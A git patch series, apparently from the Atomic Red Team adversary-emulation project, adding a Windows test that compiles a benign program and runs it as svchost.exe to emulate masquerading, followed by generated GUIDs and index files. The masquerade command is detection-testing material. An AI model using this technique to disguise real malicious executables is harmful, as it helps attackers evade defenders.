From 4ace9f41d2d1963ef483f988029053223cae0b38 Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+Adam-Mashinchi@users.noreply.github.com>
Date: Thu, 3 Mar 2022 20:33:27 -0800
Subject: [PATCH 01/83] Update T1036.005.yaml (#1795)

Cleanup file and add new test "Masquerade" test.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1036.005/T1036.005.yaml | 29 ++++++++++++++++++++++++-----
 1 file changed, 24 insertions(+), 5 deletions(-)

diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml
index 2dc6b7b9..69d6b849 100644
--- a/atomics/T1036.005/T1036.005.yaml
+++ b/atomics/T1036.005/T1036.005.yaml
@@ -1,23 +1,18 @@
----
 attack_technique: T1036.005
 display_name: 'Masquerading: Match Legitimate Name or Location'
-
 atomic_tests:
 - name: Execute a process from a directory masquerading as the current parent directory.
   auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
   description: |
     Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
-
   supported_platforms:
     - macos
     - linux
-
   input_arguments:
     test_message:
       description: Test message to echo out to the screen
       type: String
       default: Hello from the Atomic Red Team test T1036.005#1
-
   executor:
     name: sh
     elevation_required: false
@@ -28,3 +23,27 @@ atomic_tests:
     cleanup_command: |
       rm -f $HOME/.../sh
       rmdir $HOME/.../
+- name: Masquerade as a built-in system executable
+  description: |
+    Launch an executable that attempts to masquerade as a legitimate executable.
+  supported_platforms:
+  - windows
+  input_arguments:
+    executable_filepath:
+      description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
+      type: String
+      default: $Env:windir\Temp\svchost.exe
+  executor:
+    command: |
+      Add-Type -TypeDefinition @'
+      public class Test {
+          public static void Main(string[] args) {
+              System.Console.WriteLine("tweet, tweet");
+          }
+      }
+      '@ -OutputAssembly "#{executable_filepath}"
+      
+      Start-Process -FilePath "#{executable_filepath}"
+    cleanup_command: |
+      Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+    name: powershell

From b355887a3c34685af7c88e393c32fcb45ae8379e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Fri, 4 Mar 2022 04:34:02 +0000
Subject: [PATCH 02/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1036.005/T1036.005.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml
index 69d6b849..99b00201 100644
--- a/atomics/T1036.005/T1036.005.yaml
+++ b/atomics/T1036.005/T1036.005.yaml
@@ -24,6 +24,7 @@ atomic_tests:
       rm -f $HOME/.../sh
       rmdir $HOME/.../
 - name: Masquerade as a built-in system executable
+  auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
   description: |
     Launch an executable that attempts to masquerade as a legitimate executable.
   supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 54518a08..9ae01810 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -880,3 +880,4 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd
 12631354-fdbc-4164-92be-402527e748da
 5fc528dd-79de-47f5-8188-25572b7fafe0
 e895677d-4f06-49ab-91b6-ae3742d0a2ba
+35eb8d16-9820-4423-a2a1-90c4f5edd9ca

From a3717a8c52a20b58d75e9c5785b36c6561ff15fe Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 4 Mar 2022 04:34:08 +0000
Subject: [PATCH 03/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-windows.json          |  2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  3 +-
 atomics/Indexes/Matrices/windows-matrix.md    |  2 +-
 atomics/Indexes/index.yaml                    | 30 ++++++++++++
 atomics/T1036.005/T1036.005.md                | 47 +++++++++++++++++++
 8 files changed, 84 insertions(+), 3 deletions(-)

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index df0d8122..6cc97475 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View 